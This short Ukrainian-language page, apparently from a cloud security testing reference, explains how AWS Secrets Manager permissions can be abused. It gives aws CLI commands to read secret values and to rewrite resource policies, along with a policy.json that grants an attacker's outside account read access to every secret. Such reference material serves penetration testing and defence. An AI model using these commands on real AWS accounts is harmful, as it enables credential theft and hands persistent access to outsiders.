Менеджер секретів

Для отримання додаткової інформації про менеджер секретів перегляньте:

secretsmanager:GetSecretValue

Атакувальник з цим дозволом може отримати збережене значення всередині секрету в AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Потенційний вплив: Доступ до високочутливих даних всередині служби керування секретами AWS.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

За допомогою попередніх дозволів можливо надати доступ іншим принципалам/акаунтам (навіть зовнішнім) до доступу до секрету. Зверніть увагу, що для читання зашифрованих секретів за допомогою ключа KMS, користувач також повинен мати доступ до ключа KMS (додаткова інформація на сторінці KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}